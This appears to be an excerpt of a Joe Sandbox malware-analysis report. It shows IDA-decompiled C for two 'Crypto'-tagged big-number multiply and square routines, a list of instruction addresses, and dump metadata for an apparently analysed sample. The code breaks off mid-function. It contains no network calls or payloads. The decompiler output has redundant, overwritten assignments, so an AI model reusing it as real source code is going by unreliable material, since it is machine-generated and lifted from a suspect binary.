				_t390 = __ecx[1] & 0x0000ffff;
				_v16 = _t390;
				_v20 = __eax[1] & 0x0000ffff;
				_t306 =  *__ecx & 0x0000ffff;
				_t307 = _t306 * _t264;
				_v12 = _t390 * _t264;
				_t505 = _t306 * _v20 + _v12;
				_v16 = _v16 * (__eax[1] & 0x0000ffff);
				if(_t505 < _v12) {
					_v16 = _v16 + 0x10000;
				}
				_t506 = _t505 << 0x10;
				_v16 = _v16 + (_t505 >> 0x10);
				_t308 = _t307 + _t506;
				if(_t308 < _t506) {
					_v16 = _v16 + 1;
				}
				 *_a4 = _t308;
				_t309 =  *_t300 & 0x0000ffff;
				_t508 = _t300[1] & 0x0000ffff;
				_v8 = _v8 & 0x00000000;
				_t268 = _t258[2] & 0x0000ffff;
				_v20 = _t309 * (_t258[3] & 0x0000ffff);
				_t310 = _t309 * _t268;
				_t398 = _t508 * _t268;
				_t509 = _t508 * (_t258[3] & 0x0000ffff);
				_t271 = _v20 + _t398;
				if(_t271 < _t398) {
					_t509 = _t509 + 0x10000;
				}
				_t272 = _t271 << 0x10;
				_t311 = _t310 + _t272;
				_t510 = _t509 + (_t271 >> 0x10);
				if(_t311 < _t272) {
					_t510 = _t510 + 1;
				}
				_t402 = _v16 + _t311;
				_v20 = _t510;
				_v12 = _t402;
				if(_t402 < _t311) {
					_v20 = _t510 + 1;
				}
				_t273 =  *_t258 & 0x0000ffff;
				_t511 = _t300[2] & 0x0000ffff;
				_t403 = _t300[3] & 0x0000ffff;
				_v16 = _t258[1] & 0x0000ffff;
				_v16 = _t511 * _t273;
				_t514 = _t403 * _t273;
				_t315 = _t511 * _v16 + _t514;
				_t404 = _t403 * (_t258[1] & 0x0000ffff);
				if(_t315 < _t514) {
					_t404 = _t404 + 0x10000;
				}
				_t405 = _t404 + (_t315 >> 0x10);
				_t316 = _t315 << 0x10;
				_t518 = _v16 + _t316;
				if(_t518 < _t316) {
					_t405 = _t405 + 1;
				}
				_t318 = _v12 + _t518;
				if(_t318 < _t518) {
					_t405 = _t405 + 1;
				}
				_t520 = _v20 + _t405;
				_v16 = _t520;
				if(_t520 < _t405) {
					_v8 = 1;
				}
				 *((intOrPtr*)(_a4 + 4)) = _t318;
				_t275 =  *_t258 & 0x0000ffff;
				_t406 = _t300[4] & 0x0000ffff;
				_t522 = _t300[5] & 0x0000ffff;
				_v12 = _v12 & 0x00000000;
				_v20 = _t258[1] & 0x0000ffff;
				_v20 = _t406 * _t275;
				_t409 = _t522 * _t275;
				_t322 = _t406 * _v20 + _t409;
				_t523 = _t522 * (_t258[1] & 0x0000ffff);
				if(_t322 < _t409) {
					_t523 = _t523 + 0x10000;
				}
				_t524 = _t523 + (_t322 >> 0x10);
				_t323 = _t322 << 0x10;
				_t413 = _v20 + _t323;
				if(_t413 < _t323) {
					_t524 = _t524 + 1;
				}
				_v16 = _v16 + _t413;
				if(_v16 < _t413) {
					_t524 = _t524 + 1;
				}
				_v8 = _v8 + _t524;
				if(_v8 < _t524) {
					_v12 = 1;
				}
				_t277 = _t258[2] & 0x0000ffff;
				_t414 = _t300[2] & 0x0000ffff;
				_t525 = _t300[3] & 0x0000ffff;
				_v20 = _t258[3] & 0x0000ffff;
				_v20 = _t414 * _t277;
				_t417 = _t525 * _t277;
				_t327 = _t414 * _v20 + _t417;
				_t526 = _t525 * (_t258[3] & 0x0000ffff);
				if(_t327 < _t417) {
					_t526 = _t526 + 0x10000;
				}
				_t527 = _t526 + (_t327 >> 0x10);
				_t328 = _t327 << 0x10;
				_t421 = _v20 + _t328;
				if(_t421 < _t328) {
					_t527 = _t527 + 1;
				}
				_v16 = _v16 + _t421;
				if(_v16 < _t421) {
					_t527 = _t527 + 1;
				}
				_v8 = _v8 + _t527;
				if(_v8 < _t527) {
					_v12 = _v12 + 1;
				}
				_t279 = _t258[4] & 0x0000ffff;
				_t422 =  *_t300 & 0x0000ffff;
				_t528 = _t300[1] & 0x0000ffff;
				_v20 = _t258[5] & 0x0000ffff;
				_v20 = _t422 * _t279;
				_t425 = _t528 * _t279;
				_t332 = _t422 * _v20 + _t425;
				_t529 = _t528 * (_t258[5] & 0x0000ffff);
				if(_t332 < _t425) {
					_t529 = _t529 + 0x10000;
				}
				_t530 = _t529 + (_t332 >> 0x10);
				_t333 = _t332 << 0x10;
				_t429 = _v20 + _t333;
				if(_t429 < _t333) {
					_t530 = _t530 + 1;
				}
				_t335 = _v16 + _t429;
				if(_t335 < _t429) {
					_t530 = _t530 + 1;
				}
				_v8 = _v8 + _t530;
				if(_v8 < _t530) {
					_v12 = _v12 + 1;
				}
				 *((intOrPtr*)(_a4 + 8)) = _t335;
				_t281 = _t258[6] & 0x0000ffff;
				_t430 =  *_t300 & 0x0000ffff;
				_t532 = _t300[1] & 0x0000ffff;
				_v16 = _v16 & 0x00000000;
				_v20 = _t258[7] & 0x0000ffff;
				_v20 = _t430 * _t281;
				_t433 = _t532 * _t281;
				_t339 = _t430 * _v20 + _t433;
				_t533 = _t532 * (_t258[7] & 0x0000ffff);
				if(_t339 < _t433) {
					_t533 = _t533 + 0x10000;
				}
				_t534 = _t533 + (_t339 >> 0x10);
				_t340 = _t339 << 0x10;
				_t437 = _v20 + _t340;
				if(_t437 < _t340) {
					_t534 = _t534 + 1;
				}
				_v8 = _v8 + _t437;
				if(_v8 < _t437) {
					_t534 = _t534 + 1;
				}
				_v12 = _v12 + _t534;
				if(_v12 < _t534) {
					_v16 = 1;
				}
				_t283 = _t258[4] & 0x0000ffff;
				_t438 = _t300[2] & 0x0000ffff;
				_t535 = _t300[3] & 0x0000ffff;
				_v20 = _t258[5] & 0x0000ffff;
				_v20 = _t438 * _t283;
				_t441 = _t535 * _t283;
				_t344 = _t438 * _v20 + _t441;
				_t536 = _t535 * (_t258[5] & 0x0000ffff);
				if(_t344 < _t441) {
					_t536 = _t536 + 0x10000;
				}
				_t537 = _t536 + (_t344 >> 0x10);
				_t345 = _t344 << 0x10;
				_t445 = _v20 + _t345;
				if(_t445 < _t345) {
					_t537 = _t537 + 1;
				}
				_v8 = _v8 + _t445;
				if(_v8 < _t445) {
					_t537 = _t537 + 1;
				}
				_v12 = _v12 + _t537;
				if(_v12 < _t537) {
					_v16 = _v16 + 1;
				}
				_t285 = _t258[2] & 0x0000ffff;
				_t446 = _t300[4] & 0x0000ffff;
				_t538 = _t300[5] & 0x0000ffff;
				_v20 = _t258[3] & 0x0000ffff;
				_v20 = _t446 * _t285;
				_t449 = _t538 * _t285;
				_t349 = _t446 * _v20 + _t449;
				_t539 = _t538 * (_t258[3] & 0x0000ffff);
				if(_t349 < _t449) {
					_t539 = _t539 + 0x10000;
				}
				_t540 = _t539 + (_t349 >> 0x10);
				_t350 = _t349 << 0x10;
				_t453 = _v20 + _t350;
				if(_t453 < _t350) {
					_t540 = _t540 + 1;
				}
				_v8 = _v8 + _t453;
				if(_v8 < _t453) {
					_t540 = _t540 + 1;
				}
				_v12 = _v12 + _t540;
				if(_v12 < _t540) {
					_v16 = _v16 + 1;
				}
				_t287 =  *_t258 & 0x0000ffff;
				_t454 = _t300[6] & 0x0000ffff;
				_t541 = _t300[7] & 0x0000ffff;
				_v20 = _t258[1] & 0x0000ffff;
				_v20 = _t454 * _t287;
				_t457 = _t541 * _t287;
				_t354 = _t454 * _v20 + _t457;
				_t542 = _t541 * (_t258[1] & 0x0000ffff);
				if(_t354 < _t457) {
					_t542 = _t542 + 0x10000;
				}
				_t543 = _t542 + (_t354 >> 0x10);
				_t355 = _t354 << 0x10;
				_t461 = _v20 + _t355;
				if(_t461 < _t355) {
					_t543 = _t543 + 1;
				}
				_t357 = _v8 + _t461;
				if(_t357 < _t461) {
					_t543 = _t543 + 1;
				}
				_v12 = _v12 + _t543;
				if(_v12 < _t543) {
					_v16 = _v16 + 1;
				}
				 *((intOrPtr*)(_a4 + 0xc)) = _t357;
				_t289 = _t258[2] & 0x0000ffff;
				_t462 = _t300[6] & 0x0000ffff;
				_t545 = _t300[7] & 0x0000ffff;
				_v8 = _v8 & 0x00000000;
				_v20 = _t258[3] & 0x0000ffff;
				_v20 = _t462 * _t289;
				_t465 = _t545 * _t289;
				_t361 = _t462 * _v20 + _t465;
				_t546 = _t545 * (_t258[3] & 0x0000ffff);
				if(_t361 < _t465) {
					_t546 = _t546 + 0x10000;
				}
				_t547 = _t546 + (_t361 >> 0x10);
				_t362 = _t361 << 0x10;
				_t469 = _v20 + _t362;
				if(_t469 < _t362) {
					_t547 = _t547 + 1;
				}
				_v12 = _v12 + _t469;
				if(_v12 < _t469) {
					_t547 = _t547 + 1;
				}
				_v16 = _v16 + _t547;
				if(_v16 < _t547) {
					_v8 = 1;
				}
				_t291 = _t258[4] & 0x0000ffff;
				_t470 = _t300[4] & 0x0000ffff;
				_t548 = _t300[5] & 0x0000ffff;
				_v20 = _t258[5] & 0x0000ffff;
				_v20 = _t470 * _t291;
				_t473 = _t548 * _t291;
				_t366 = _t470 * _v20 + _t473;
				_t549 = _t548 * (_t258[5] & 0x0000ffff);
				if(_t366 < _t473) {
					_t549 = _t549 + 0x10000;
				}
				_t550 = _t549 + (_t366 >> 0x10);
				_t367 = _t366 << 0x10;
				_t477 = _v20 + _t367;
				if(_t477 < _t367) {
					_t550 = _t550 + 1;
				}
				_v12 = _v12 + _t477;
				if(_v12 < _t477) {
					_t550 = _t550 + 1;
				}
				_v16 = _v16 + _t550;
				if(_v16 < _t550) {
					_v8 = _v8 + 1;
				}
				_t293 = _t258[6] & 0x0000ffff;
				_t478 = _t300[2] & 0x0000ffff;
				_t551 = _t300[3] & 0x0000ffff;
				_v20 = _t258[7] & 0x0000ffff;
				_v20 = _t478 * _t293;
				_t481 = _t551 * _t293;
				_t371 = _t478 * _v20 + _t481;
				_t552 = _t551 * (_t258[7] & 0x0000ffff);
				if(_t371 < _t481) {
					_t552 = _t552 + 0x10000;
				}
				_t553 = _t552 + (_t371 >> 0x10);
				_t372 = _t371 << 0x10;
				_t485 = _v20 + _t372;
				if(_t485 < _t372) {
					_t553 = _t553 + 1;
				}
				_t374 = _v12 + _t485;
				if(_t374 < _t485) {
					_t553 = _t553 + 1;
				}
				_v16 = _v16 + _t553;
				if(_v16 < _t553) {
					_v8 = _v8 + 1;
				}
				 *((intOrPtr*)(_a4 + 0x10)) = _t374;
				_t295 = _t258[6] & 0x0000ffff;
				_t486 = _t300[4] & 0x0000ffff;
				_t555 = _t300[5] & 0x0000ffff;
				_v12 = _v12 & 0x00000000;
				_v20 = _t258[7] & 0x0000ffff;
				_v20 = _t486 * _t295;
				_t489 = _t555 * _t295;
				_t378 = _t486 * _v20 + _t489;
				_t556 = _t555 * (_t258[7] & 0x0000ffff);
				if(_t378 < _t489) {
					_t556 = _t556 + 0x10000;
				}
				_t557 = _t556 + (_t378 >> 0x10);
				_t379 = _t378 << 0x10;
				_t493 = _v20 + _t379;
				if(_t493 < _t379) {
					_t557 = _t557 + 1;
				}
				_v16 = _v16 + _t493;
				if(_v16 < _t493) {
					_t557 = _t557 + 1;
				}
				_v8 = _v8 + _t557;
				if(_v8 < _t557) {
					_v12 = 1;
				}
				_t297 = _t258[4] & 0x0000ffff;
				_t494 = _t300[6] & 0x0000ffff;
				_t558 = _t300[7] & 0x0000ffff;
				_v20 = _t258[5] & 0x0000ffff;
				_v20 = _t494 * _t297;
				_t497 = _t558 * _t297;
				_t383 = _t494 * _v20 + _t497;
				_t559 = _t558 * (_t258[5] & 0x0000ffff);
				if(_t383 < _t497) {
					_t559 = _t559 + 0x10000;
				}
				_t560 = _t559 + (_t383 >> 0x10);
				_t384 = _t383 << 0x10;
				_t501 = _v20 + _t384;
				if(_t501 < _t384) {
					_t560 = _t560 + 1;
				}
				_t386 = _v16 + _t501;
				if(_t386 < _t501) {
					_t560 = _t560 + 1;
				}
				_v8 = _v8 + _t560;
				if(_v8 < _t560) {
					_v12 = _v12 + 1;
				}
				 *((intOrPtr*)(_a4 + 0x14)) = _t386;
				_t387 = _t300[6] & 0x0000ffff;
				_t502 = _t258[6] & 0x0000ffff;
				_t299 = _t258[7] & 0x0000ffff;
				_t301 = _t300[7] & 0x0000ffff;
				_t388 = _t387 * _t502;
				_t302 = _t301 * _t299;
				_t563 = _t301 * _t502;
				_t261 = _t387 * _t299 + _t563;
				if(_t261 < _t563) {
					_t302 = _t302 + 0x10000;
				}
				_t262 = _t261 << 0x10;
				_t389 = _t388 + _t262;
				_t303 = _t302 + (_t261 >> 0x10);
				if(_t389 < _t262) {
					_t303 = _t303 + 1;
				}
				_t567 = _v8 + _t389;
				if(_t567 < _t389) {
					_t303 = _t303 + 1;
				}
				_t263 = _a4;
				 *((intOrPtr*)(_t263 + 0x18)) = _t567;
				 *((intOrPtr*)(_t263 + 0x1c)) = _t303 + _v12;
				return _t263;
			}



































































































































































    0x003d8a1c
    0x003d8a1c
    0x003d8a27
    0x003d8a2c
    0x003d8a30
    0x003d8a36
    0x003d8a39
    0x003d8a3e
    0x003d8a48
    0x003d8a4f
    0x003d8a55
    0x003d8a5b
    0x003d8a5d
    0x003d8a5d
    0x003d8a66
    0x003d8a6c
    0x003d8a6f
    0x003d8a73
    0x003d8a75
    0x003d8a75
    0x003d8a7b
    0x003d8a7d
    0x003d8a84
    0x003d8a88
    0x003d8a91
    0x003d8a95
    0x003d8a98
    0x003d8a9d
    0x003d8aa4
    0x003d8aaa
    0x003d8aae
    0x003d8ab0
    0x003d8ab0
    0x003d8ab8
    0x003d8abe
    0x003d8ac0
    0x003d8ac4
    0x003d8ac6
    0x003d8ac6
    0x003d8aca
    0x003d8acc
    0x003d8acf
    0x003d8ad4
    0x003d8ad7
    0x003d8ad7
    0x003d8ade
    0x003d8ae1
    0x003d8ae5
    0x003d8ae9
    0x003d8af5
    0x003d8afa
    0x003d8b01
    0x003d8b03
    0x003d8b08
    0x003d8b0a
    0x003d8b0a
    0x003d8b15
    0x003d8b1a
    0x003d8b1d
    0x003d8b21
    0x003d8b23
    0x003d8b23
    0x003d8b27
    0x003d8b2b
    0x003d8b2d
    0x003d8b2d
    0x003d8b31
    0x003d8b33
    0x003d8b38
    0x003d8b3a
    0x003d8b3a
    0x003d8b44
    0x003d8b4b
    0x003d8b4e
    0x003d8b52
    0x003d8b56
    0x003d8b5a
    0x003d8b66
    0x003d8b6b
    0x003d8b72
    0x003d8b74
    0x003d8b79
    0x003d8b7b
    0x003d8b7b
    0x003d8b86
    0x003d8b8b
    0x003d8b8e
    0x003d8b92
    0x003d8b94
    0x003d8b94
    0x003d8b95
    0x003d8b9b
    0x003d8b9d
    0x003d8b9d
    0x003d8b9e
    0x003d8ba4
    0x003d8ba6
    0x003d8ba6
    0x003d8bb1
    0x003d8bb5
    0x003d8bb9
    0x003d8bbd
    0x003d8bc9
    0x003d8bce
    0x003d8bd5
    0x003d8bd7
    0x003d8bdc
    0x003d8bde
    0x003d8bde
    0x003d8be9
    0x003d8bee
    0x003d8bf1
    0x003d8bf5
    0x003d8bf7
    0x003d8bf7
    0x003d8bf8
    0x003d8bfe
    0x003d8c00
    0x003d8c00
    0x003d8c01
    0x003d8c07
    0x003d8c09
    0x003d8c09
    0x003d8c10
    0x003d8c14
    0x003d8c17
    0x003d8c1b
    0x003d8c27
    0x003d8c2c
    0x003d8c33
    0x003d8c35
    0x003d8c3a
    0x003d8c3c
    0x003d8c3c
    0x003d8c47
    0x003d8c4c
    0x003d8c4f
    0x003d8c53
    0x003d8c55
    0x003d8c55
    0x003d8c59
    0x003d8c5d
    0x003d8c5f
    0x003d8c5f
    0x003d8c60
    0x003d8c66
    0x003d8c68
    0x003d8c68
    0x003d8c6e
    0x003d8c75
    0x003d8c79
    0x003d8c7c
    0x003d8c80
    0x003d8c84
    0x003d8c90
    0x003d8c95
    0x003d8c9c
    0x003d8c9e
    0x003d8ca3
    0x003d8ca5
    0x003d8ca5
    0x003d8cb0
    0x003d8cb5
    0x003d8cb8
    0x003d8cbc
    0x003d8cbe
    0x003d8cbe
    0x003d8cbf
    0x003d8cc5
    0x003d8cc7
    0x003d8cc7
    0x003d8cc8
    0x003d8cce
    0x003d8cd0
    0x003d8cd0
    0x003d8cdb
    0x003d8cdf
    0x003d8ce3
    0x003d8ce7
    0x003d8cf3
    0x003d8cf8
    0x003d8cff
    0x003d8d01
    0x003d8d06
    0x003d8d08
    0x003d8d08
    0x003d8d13
    0x003d8d18
    0x003d8d1b
    0x003d8d1f
    0x003d8d21
    0x003d8d21
    0x003d8d22
    0x003d8d28
    0x003d8d2a
    0x003d8d2a
    0x003d8d2b
    0x003d8d31
    0x003d8d33
    0x003d8d33
    0x003d8d3a
    0x003d8d3e
    0x003d8d42
    0x003d8d46
    0x003d8d52
    0x003d8d57
    0x003d8d5e
    0x003d8d60
    0x003d8d65
    0x003d8d67
    0x003d8d67
    0x003d8d72
    0x003d8d77
    0x003d8d7a
    0x003d8d7e
    0x003d8d80
    0x003d8d80
    0x003d8d81
    0x003d8d87
    0x003d8d89
    0x003d8d89
    0x003d8d8a
    0x003d8d90
    0x003d8d92
    0x003d8d92
    0x003d8d99
    0x003d8d9c
    0x003d8da0
    0x003d8da4
    0x003d8db0
    0x003d8db5
    0x003d8dbc
    0x003d8dbe
    0x003d8dc3
    0x003d8dc5
    0x003d8dc5
    0x003d8dd0
    0x003d8dd5
    0x003d8dd8
    0x003d8ddc
    0x003d8dde
    0x003d8dde
    0x003d8de2
    0x003d8de6
    0x003d8de8
    0x003d8de8
    0x003d8de9
    0x003d8def
    0x003d8df1
    0x003d8df1
    0x003d8df7
    0x003d8dfe
    0x003d8e02
    0x003d8e06
    0x003d8e0a
    0x003d8e0e
    0x003d8e1a
    0x003d8e1f
    0x003d8e26
    0x003d8e28
    0x003d8e2d
    0x003d8e2f
    0x003d8e2f
    0x003d8e3a
    0x003d8e3f
    0x003d8e42
    0x003d8e46
    0x003d8e48
    0x003d8e48
    0x003d8e49
    0x003d8e4f
    0x003d8e51
    0x003d8e51
    0x003d8e52
    0x003d8e58
    0x003d8e5a
    0x003d8e5a
    0x003d8e65
    0x003d8e69
    0x003d8e6d
    0x003d8e71
    0x003d8e7d
    0x003d8e82
    0x003d8e89
    0x003d8e8b
    0x003d8e90
    0x003d8e92
    0x003d8e92
    0x003d8e9d
    0x003d8ea2
    0x003d8ea5
    0x003d8ea9
    0x003d8eab
    0x003d8eab
    0x003d8eac
    0x003d8eb2
    0x003d8eb4
    0x003d8eb4
    0x003d8eb5
    0x003d8ebb
    0x003d8ebd
    0x003d8ebd
    0x003d8ec4
    0x003d8ec8
    0x003d8ecc
    0x003d8ed0
    0x003d8edc
    0x003d8ee1
    0x003d8ee8
    0x003d8eea
    0x003d8eef
    0x003d8ef1
    0x003d8ef1
    0x003d8efc
    0x003d8f01
    0x003d8f04
    0x003d8f08
    0x003d8f0a
    0x003d8f0a
    0x003d8f0e
    0x003d8f12
    0x003d8f14
    0x003d8f14
    0x003d8f15
    0x003d8f1b
    0x003d8f1d
    0x003d8f1d
    0x003d8f23
    0x003d8f2a
    0x003d8f2e
    0x003d8f32
    0x003d8f36
    0x003d8f3a
    0x003d8f46
    0x003d8f4b
    0x003d8f52
    0x003d8f54
    0x003d8f59
    0x003d8f5b
    0x003d8f5b
    0x003d8f66
    0x003d8f6b
    0x003d8f6e
    0x003d8f72
    0x003d8f74
    0x003d8f74
    0x003d8f75
    0x003d8f7b
    0x003d8f7d
    0x003d8f7d
    0x003d8f7e
    0x003d8f84
    0x003d8f86
    0x003d8f86
    0x003d8f91
    0x003d8f95
    0x003d8f99
    0x003d8f9d
    0x003d8fa9
    0x003d8fae
    0x003d8fb5
    0x003d8fb7
    0x003d8fbc
    0x003d8fbe
    0x003d8fbe
    0x003d8fc9
    0x003d8fce
    0x003d8fd1
    0x003d8fd5
    0x003d8fd7
    0x003d8fd7
    0x003d8fdb
    0x003d8fdf
    0x003d8fe1
    0x003d8fe1
    0x003d8fe2
    0x003d8fe8
    0x003d8fea
    0x003d8fea
    0x003d8ff0
    0x003d8ff3
    0x003d8ff7
    0x003d8ffb
    0x003d8fff
    0x003d9005
    0x003d900d
    0x003d9010
    0x003d9013
    0x003d9017
    0x003d9019
    0x003d9019
    0x003d9021
    0x003d9027
    0x003d9029
    0x003d902d
    0x003d902f
    0x003d902f
    0x003d9033
    0x003d9037
    0x003d9039
    0x003d9039
    0x003d903a
    0x003d9041
    0x003d9045
    0x003d904a

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D9F4C, Relevance: .4, Instructions: 363Crypto
    C-Code - Quality: 100%
    			E003D9F4C(unsigned int* __eax, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _t167;
				unsigned int _t168;
				signed int _t169;
				void* _t174;
				unsigned int _t175;
				signed int _t176;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				intOrPtr _t182;
				signed int _t183;
				signed int _t184;
				void* _t186;
				signed int _t188;
				signed int _t189;
				void* _t190;
				signed int _t192;
				void* _t194;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t203;
				void* _t204;
				signed int _t206;
				signed int _t207;
				void* _t208;
				signed int _t210;
				void* _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				void* _t225;
				unsigned int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				void* _t233;
				unsigned int _t234;
				signed int _t235;
				void* _t237;
				unsigned int _t240;
				signed int _t241;
				signed int _t242;
				unsigned int _t245;
				signed int _t246;
				void* _t247;
				unsigned int _t250;
				signed int _t251;
				void* _t252;
				unsigned int _t253;
				signed int _t254;
				void* _t256;
				unsigned int _t259;
				signed int _t260;
				signed int _t261;
				intOrPtr _t263;
				unsigned int _t266;
				signed int _t267;
				signed int _t268;
				intOrPtr _t270;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				void* _t279;
				signed int _t282;
				signed int _t284;
				signed int _t287;
				signed int _t289;
				signed int _t292;
				signed int _t294;
				signed int _t299;
				signed int _t301;
				signed int _t304;
				signed int _t306;
				void* _t310;
				void* _t311;
				intOrPtr _t312;
				unsigned int _t317;
				signed int _t318;
				void* _t319;
				intOrPtr _t320;
				unsigned int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t328;
				void* _t329;
				signed int _t330;
				signed int _t331;
				void* _t332;
				unsigned int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				void* _t338;
				signed int _t339;
				signed int _t340;
				void* _t341;
				signed int _t342;

				_t167 = __eax;
				_t175 =  *__eax;
				_t184 = _t175 & 0x0000ffff;
				_t176 = _t175 >> 0x10;
				_t228 = _t184 * _t176;
				_t229 = _t228 << 0x11;
				_t186 = _t184 * _t184 + _t229;
				_t178 = _t176 * _t176 + (_t228 >> 0xf);
				if(_t186 < _t229) {
					_t178 = _t178 + 1;
				}
				 *_a4 = _t186;
				_t274 = _t167[1] & 0x0000ffff;
				_t231 = _t167[3] & 0x0000ffff;
				_v8 = _v8 & 0x00000000;
				_v16 =  *_t167 & 0x0000ffff;
				_t188 = _t167[2] & 0x0000ffff;
				_t189 = _t188 * _v16;
				_v20 = _t274;
				_t232 = _t231 * _v20;
				_t276 = _t231 * _v16;
				_t317 = _t188 * _t274 + _t276;
				if(_t317 < _t276) {
					_t232 = _t232 + 0x10000;
				}
				_t318 = _t317 << 0x10;
				_t190 = _t189 + _t318;
				_t233 = _t232 + (_t317 >> 0x10);
				if(_t190 < _t318) {
					_t233 = _t233 + 1;
				}
				_t319 = _t190 + _t178;
				_t279 = _t233;
				if(_t319 < _t190) {
					_t279 = _t233 + 1;
				}
				_t320 = _t319 + _t190;
				if(_t320 < _t190) {
					_t233 = _t233 + 1;
				}
				_t179 = _t279 + _t233;
				if(_t179 < _t233) {
					_v8 = 1;
				}
				_v12 = _v12 & 0x00000000;
				 *((intOrPtr*)(_a4 + 4)) = _t320;
				_t234 = _t167[2];
				_t192 = _t234 & 0x0000ffff;
				_t235 = _t234 >> 0x10;
				_t322 = _t192 * _t235;
				_t323 = _t322 << 0x11;
				_t194 = _t192 * _t192 + _t323;
				_t237 = _t235 * _t235 + (_t322 >> 0xf);
				if(_t194 < _t323) {
					_t237 = _t237 + 1;
				}
				_t180 = _t179 + _t194;
				if(_t180 < _t194) {
					_t237 = _t237 + 1;
				}
				_v8 = _v8 + _t237;
				if(_v8 < _t237) {
					_v12 = 1;
				}
				_t324 = _t167[4] & 0x0000ffff;
				_t282 = _t167[1] & 0x0000ffff;
				_v16 =  *_t167 & 0x0000ffff;
				_t196 = _t167[5] & 0x0000ffff;
				_t325 = _t324 * _v16;
				_v20 = _t282;
				_t197 = _t196 * _v20;
				_t284 = _t196 * _v16;
				_t240 = _t324 * _t282 + _t284;
				if(_t240 < _t284) {
					_t197 = _t197 + 0x10000;
				}
				_t241 = _t240 << 0x10;
				_t326 = _t325 + _t241;
				_t198 = _t197 + (_t240 >> 0x10);
				if(_t326 < _t241) {
					_t198 = _t198 + 1;
				}
				_t181 = _t180 + _t326;
				_v20 = _t198;
				_t242 = _t198;
				if(_t181 < _t326) {
					_t242 = _t198 + 1;
				}
				_v8 = _v8 + _t242;
				if(_v8 < _t242) {
					_v12 = _v12 + 1;
				}
				_t182 = _t181 + _t326;
				_t199 = _t198 + 1;
				if(_t199 >= 0) {
					_t199 = _v20;
				}
				_v8 = _v8 + _t199;
				if(_v8 < _t199) {
					_v12 = _v12 + 1;
				}
				_v16 = _v16 & 0x00000000;
				 *((intOrPtr*)(_a4 + 8)) = _t182;
				_t287 =  *_t167 & 0x0000ffff;
				_t327 = _t167[6] & 0x0000ffff;
				_v20 = _t167[1] & 0x0000ffff;
				_t202 = _t167[7] & 0x0000ffff;
				_t328 = _t327 * _t287;
				_v24 = _t287;
				_t203 = _t202 * _v20;
				_t289 = _t202 * _v24;
				_t245 = _t327 * _v20 + _t289;
				if(_t245 < _t289) {
					_t203 = _t203 + 0x10000;
				}
				_t246 = _t245 << 0x10;
				_t329 = _t328 + _t246;
				_t204 = _t203 + (_t245 >> 0x10);
				if(_t329 < _t246) {
					_t204 = _t204 + 1;
				}
				_v8 = _v8 + _t329;
				_t247 = _t204;
				if(_v8 < _t329) {
					_t247 = _t204 + 1;
				}
				_v12 = _v12 + _t247;
				if(_v12 < _t247) {
					_v16 = 1;
				}
				_v8 = _v8 + _t329;
				if(_v8 < _t329) {
					_t204 = _t204 + 1;
				}
				_v12 = _v12 + _t204;
				if(_v12 < _t204) {
					_v16 = _v16 + 1;
				}
				_t292 = _t167[2] & 0x0000ffff;
				_t330 = _t167[4] & 0x0000ffff;
				_v20 = _t167[3] & 0x0000ffff;
				_t206 = _t167[5] & 0x0000ffff;
				_t331 = _t330 * _t292;
				_v24 = _t292;
				_t207 = _t206 * _v20;
				_t294 = _t206 * _v24;
				_t250 = _t330 * _v20 + _t294;
				if(_t250 < _t294) {
					_t207 = _t207 + 0x10000;
				}
				_t251 = _t250 << 0x10;
				_t332 = _t331 + _t251;
				_t208 = _t207 + (_t250 >> 0x10);
				if(_t332 < _t251) {
					_t208 = _t208 + 1;
				}
				_v8 = _v8 + _t332;
				_t252 = _t208;
				if(_v8 < _t332) {
					_t252 = _t208 + 1;
				}
				_v12 = _v12 + _t252;
				if(_v12 < _t252) {
					_v16 = _v16 + 1;
				}
				_v8 = _v8 + _t332;
				if(_v8 < _t332) {
					_t208 = _t208 + 1;
				}
				_v12 = _v12 + _t208;
				if(_v12 < _t208) {
					_v16 = _v16 + 1;
				}
				_t183 = _a4;
				_v8 = _v8 & 0x00000000;
				 *((intOrPtr*)(_t183 + 0xc)) = _v8;
				_t253 = _t167[4];
				_t210 = _t253 & 0x0000ffff;
				_t254 = _t253 >> 0x10;
				_t334 = _t210 * _t254;
				_t335 = _t334 << 0x11;
				_t212 = _t210 * _t210 + _t335;
				_t256 = _t254 * _t254 + (_t334 >> 0xf);
				if(_t212 < _t335) {
					_t256 = _t256 + 1;
				}
				_v12 = _v12 + _t212;
				if(_v12 < _t212) {
					_t256 = _t256 + 1;
				}
				_v16 = _v16 + _t256;
				if(_v16 < _t256) {
					_v8 = 1;
				}
				_t299 = _t167[2] & 0x0000ffff;
				_t336 = _t167[6] & 0x0000ffff;
				_a4 = _t167[3] & 0x0000ffff;
				_t214 = _t167[7] & 0x0000ffff;
				_t337 = _t336 * _t299;
				_v24 = _t299;
				_t215 = _t214 * _a4;
				_t301 = _t214 * _v24;
				_t259 = _t336 * _a4 + _t301;
				if(_t259 < _t301) {
					_t215 = _t215 + 0x10000;
				}
				_t260 = _t259 << 0x10;
				_t338 = _t337 + _t260;
				_t216 = _t215 + (_t259 >> 0x10);
				if(_t338 < _t260) {
					_t216 = _t216 + 1;
				}
				_v12 = _v12 + _t338;
				_a4 = _t216;
				_t261 = _t216;
				if(_v12 < _t338) {
					_t126 = _t216 + 1; // 0x1
					_t261 = _t126;
				}
				_v16 = _v16 + _t261;
				if(_v16 < _t261) {
					_v8 = _v8 + 1;
				}
				_t263 = _v12 + _t338;
				_t217 = _t216 + 1;
				if(_t217 >= 0) {
					_t217 = _a4;
				}
				_v16 = _v16 + _t217;
